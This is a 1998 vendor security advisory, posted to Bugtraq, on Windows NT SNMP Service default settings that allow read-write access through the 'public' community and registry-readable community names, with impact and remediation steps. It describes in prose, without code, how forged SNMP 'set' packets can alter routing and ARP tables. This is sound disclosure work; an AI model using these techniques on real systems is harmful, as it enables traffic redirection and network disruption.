From seclabs@NAI.COM Wed Nov 18 12:02:43 1998 From: Security Research Labs To: BUGTRAQ@netspace.org Date: Tue, 17 Nov 1998 12:45:35 -0800 Subject: NAI-30: Windows NT SNMP Vulnerabilities [The following text is in the "iso-8859-1" character set] [Your display is set for the "US-ASCII" character set] [Some characters may be displayed incorrectly] -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ======================================================================= Network Associates, Inc. SECURITY ADVISORY #30 November 17, 1998 Windows NT SNMP Security Permissions ======================================================================= SYNOPSIS This advisory addresses a vulnerability in the common configuration of the Windows NT SNMP Service. This vulnerability allows individuals to remotely configure network parameters that are critical to the security and proper operation of the system. ======================================================================= DETAILS The SNMP Service implements the Simple Network Management Protocol in Windows NT. This service allows for the remote management of the network components of Windows NT. The SNMP Service is installed through the Network control panel by selecting the Services panel, clicking the Add button and then selecting the SNMP Service. It is not installed as part of the normal Windows NT installation process. When the SNMP Service is installed, the default configuration that is provided leaves the system vulnerable to attack. In the default configuration the SNMP service answers to a single SNMP community ``public'', which is given read-write permissions. The community is a name that is used much like an account name or a password to restrict who can access the SNMP functions and in what capacity. SNMP provides two levels of access, read-only and read-write. The Windows NT SNMP Service prior to Service Pack 4 does not allow communities to be configured as read-only, so all SNMP communities have the ability to write. If the SNMP Service is reconfigured with a more secure community name, the system is still vulnerable to attack from users with an account on the system. The SNMP Service parameters are stored in the registry and are readable by all users. A user with an account on the system can read the list of configured community names and use the community name to access the SNMP Service. With write access to the SNMP community, a user can perform actions that are usually restricted to users with privileged access. In addition to restricting access to a list of community names, the Windows NT SNMP Service has an option to restrict access to a list of IP addresses. Although this may seem to provide a way to limit exposure to attacks from unknown systems, it is not very effective. The SNMP protocol uses UDP packets to exchange commands and their replies. Because the UDP protocol is connectionless, forging the source address of command packets is trivial. SNMP ``set'' operations can be sent with any source address since the reply is not needed. Restricting the set of addresses that can communicate to the SNMP service is not effective at preventing malicious ``set'' operations if the attacker knows which addresses are allowed to communicate with the SNMP service. Like the community name, the list of addresses that can communicate with SNMP is stored in the community and accessible to users with an account on the system. ======================================================================= AFFECTED SYSTEMS All versions of Windows NT where the administrator has enabled the SNMP service and not reconfigured the security parameters are vulnerable to attack from users that can reach the system over the network. All versions of Windows NT where the administrator has enabled the SNMP Service are vulnerable to attack from users with accounts on the system. These systems are vulnerable to attack from remote users if the administrator has not removed the ``public'' community from the SNMP Service configuration and replaced it with a hard-to-guess name. ======================================================================= IMPACT Remote individuals with network access to a machine running the Windows NT SNMP Service can query and set any of the system management variables that are supported. Information that can be queried includes: - the LAN Manager domain name - a list of users - a list of shares - a list of running services - a list of active TCP connections - a list of active UDP connections - a list of network interfaces and their associated IP and hardware addresses - the IP routing table and the ARP table as well as a number of networking performance statistics. By setting variables, an attacker can modify the IP routing table and the ARP table. An attacker can also bring interfaces up and down and set critical networking parameters such as the default IP time-to-live (TTL) and IP forwarding. These settings allow an attacker to redirect network traffic, impersonate other machines or deny the machine access to the network. The ability to modify the routing table, and enable IP forwarding on an NT host is especially dangerous if the host is a firewall with SNMP enabled. ======================================================================= RESOLUTION Service Pack 4 (SP4) provides a solution to this problem by adding access control and allowing communities to be configured READ ONLY, READ WRITE or READE CREATE. By default, when Service Pack 4 is installed, the permissions will be set to READ CREATE, which still allows modification of SNMP entries, and therefore does not close this vulnerability. Ensure that the communities are configured READ ONLY to prevent modification of SNMP entries. To configure the SNMP service go to: "Control Panel" -> "Network" -> "Services" -> "SNMP Service" - From this window, select the "Security" tab. Once within the security tab, the security settings of each community name can be configured. It is recommended that each community name be configured READ ONLY unless otherwise required. The permissions on the SNMP registry key allow "Everyone" access by default. This access allows any system user to obtain the community names utilized by the SNMP service. The permissions on this registry key should also be set more strictly by the Administrator. Ensure that only Administrator and other authorized users can access the contents of the following registry key: Hive : HKEY_LOCAL_MACHINE Key : System\CurrentControlSet\Services\SNMP\Parameters On NT 5.0, the permissions on this key will be set securely by default. Ensure that the community name is changed from the default "public" community name to a more obscure name. Block SNMP access at your firewall or border router. SNMP utilizes UDP port 161. ======================================================================= CREDITS Documentation and testing of this problem was conducted by Tim Newsham and Jeremy Rauch at the security labs of Network Associates. ======================================================================= ABOUT THE NETWORK ASSOCIATES SECURITY LABS The Security Labs at Network Associates hosts some of the most important research in computer security today. With over 29 published security advisories published in the last 2 years, the Network Associates security auditing teams have been responsible for the discovery of many of the Internet's most serious security flaws. This advisory represents our ongoing commitment to provide critical information to the security community. For more information about the Security Labs at Network Associates, see our website at http://www.nai.com or contact us at . The Security Labs at Network Associates are a participating member of FIRST, the Forum for Incident Response Teams. For more information about FIRST, see http://www.first.org. ======================================================================= NETWORK ASSOCIATES SECURITY LABS PGP KEY - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGP 5.5.5 mQGiBDXGgDsRBADVOnID6BtEhKlm2cNalho28YP0JAh+J4iRUIaiWshzI0tc0KPc fvs+0xYwiqjxmeHi2sdIEPQ7S+ltA3Dlp6/DFojWBr2XB9hfWy4uiKBUHqnsKYnB Gpkh6nIx7DIwn+u0PXMXbJCG3LYf8daiPVdzC2VFtbRvJL4wZc6NLQViFQCg/9uS DuH/0NE6mO8Cu4iVrUT5Wk8D/ArOpV5T5yIuXHZO1/ZBVeHccVVvHe8wHK4D9WUs FsB8fgYLNgdFMMjtam7QQSBY/P1KKBzaFqZhkfS4WVMAFEy94NHXG+KTCPhXkZzp OPPqwWqZgfvOg0Bm20O/GhzQkB6JfFJqcfR87Ej0+fcDKrTTxAELWHGS7c9Qdn6P bfwHA/4oLNwYrtgWNkjGcG018Pu2jKT7YuP9zBTMu28IBiWdPLGL9Wle4d5cdDVx Es4iVl8FMtxlgTWCgMnBLS4nyM3pCn1HF+8Gi+IVKUXWCkqt/rtBMsrOMfrOgEIu BWnTZcTR7kcWtH7xDFNyZ47U4pElLXwATVDty/FczAJnpeht2LQyTmV0d29yayBB c3NvY2lhdGVzIFNlY3VyaXR5IExhYnMgPHNlY2xhYnNAbmFpLmNvbT6JAEsEEBEC AAsFAjXGgDsECwMCAQAKCRCheCy6j9WBEtgDAKDpYMwQZP0Ipx7X0ivnTxxJkA/W vACg4LZv0lmWqmnd7XCe4OIJ05aT6hK5Ag0ENcaAOxAIAPZCV7cIfwgXcqK61qlC 8wXo+VMROU+28W65Szgg2gGnVqMU6Y9AVfPQB8bLQ6mUrfdMZIZJ+AyDvWXpF9Sh 01D49Vlf3HZSTz09jdvOmeFXklnN/biudE/F/Ha8g8VHMGHOfMlm/xX5u/2RXscB qtNbno2gpXI61Brwv0YAWCvl9Ij9WE5J280gtJ3kkQc2azNsOA1FHQ98iLMcfFst jvbzySPAQ/ClWxiNjrtVjLhdONM0/XwXV0OjHRhs3jMhLLUq/zzhsSlAGBGNfISn CnLWhsQDGcgHKXrKlQzZlp+r0ApQmwJG0wg9ZqRdQZ+cfL2JSyIZJrqrol7DVeky CzsAAgIH/RZcJoRkhCf9O4Er+rciBNG3QqM3tek23oxGuVwqRxtGlGKuf+YaUDIA vZhARftupZYJf/+AM9pyjjsF7ON/Df5oIXXhqzrDySw47dNB3I1FG7vwAUBRfYgG NRP+zvf1nld+FgAXag1DIQteXYPtoMUJP8ZgvbELYVdZS2TapOHUv7r4rOY+UUjl U+FkQPp9KCNreaNux4NxwT3tzXl1KqqkliC8sYxvMCkJ+JO71TKGplO9dXsf3O8p 2r33+LngmLs4O7inrUlmAUKq3jmCK50J7RsZjd6PlK/0JwcjFkOZeYrxTguZzCR4 QYmo8nEHqEMSKQci0VUf9KH4lHf6xmGJAEYEGBECAAYFAjXGgDsACgkQoXgsuo/V gRK5LACgoAqLFk10kAMu6xb3ftO4+INJs14Ani+1hujlYRxYphN97c5ci8WtILNZ =L3C6 - -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: PGP 6.0 iQA/AwUBNlFSeKF4LLqP1YESEQJz2wCfa/RZiCMpQxd/cT8moR4m3GnzGzIAoMPU ybY9nPnqVfjX5Wxv2rf/yrx0 =3ksc -----END PGP SIGNATURE-----